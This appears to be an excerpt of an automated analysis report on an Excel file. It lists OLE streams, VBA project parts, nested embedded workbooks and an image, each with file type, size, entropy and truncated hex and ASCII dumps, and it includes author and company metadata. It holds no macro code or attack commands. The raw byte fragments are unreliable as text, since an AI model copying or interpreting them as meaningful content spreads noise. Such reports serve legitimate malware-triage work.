          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 9d 36 9c b7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet1"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
          VBA File Name:Sheet2.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 | . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 9d 36 86 7c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet2"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:244
          Entropy:2.889430592781307
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:200
          Entropy:3.3020681057018666
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . D P . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
          General
          Stream Path:MBD0191BFB6/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB6/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:12479
          Entropy:7.0945112382968425
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB7/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB7/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:37036
          Entropy:7.720975169587741
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b7 a1 38 de e3 01 00 00 cb 09 00 00 13 00 e9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:244
          Entropy:2.701136490257069
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
          General
          Stream Path:MBD0191BFB8/\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:220
          Entropy:3.372234242231489
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD0191BFB8/MBD0018D4CE/\x1Ole
          CLSID:
          File Type:data
          Stream Size:20
          Entropy:0.5689955935892812
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . .
          Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD0018D4CE/\x3ObjInfo
          CLSID:
          File Type:data
          Stream Size:4
          Entropy:0.8112781244591328
          Base64 Encoded:False
          Data ASCII:. . . .
          Data Raw:00 00 03 00
          General
          Stream Path:MBD0191BFB8/MBD0018D4CE/Contents
          CLSID:
          File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
          Stream Size:197671
          Entropy:6.989042939766534
          Base64 Encoded:True
          Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD0068D442/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.219515110876372
          Base64 Encoded:False
          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD0068D442/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:26243
          Entropy:7.635433729726103
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:248
          Entropy:3.0523231150355867
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:256
          Entropy:4.086306928392587
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:134792
          Entropy:7.974168320310173
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:468
          Entropy:5.269289820125323
          Base64 Encoded:True
          Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
          Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:83
          Entropy:3.0672749060249043
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
          CLSID:
          File Type:data
          Stream Size:2486
          Entropy:3.9244127831265385
          Base64 Encoded:False
          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
          CLSID:
          File Type:data
          Stream Size:536
          Entropy:6.330646364694152
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
          Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
          General
          Stream Path:MBD0191BFB8/MBD00726B69/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.219515110876372
          Base64 Encoded:False
          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD00726B69/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:26242
          Entropy:7.635424485665502
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/Workbook
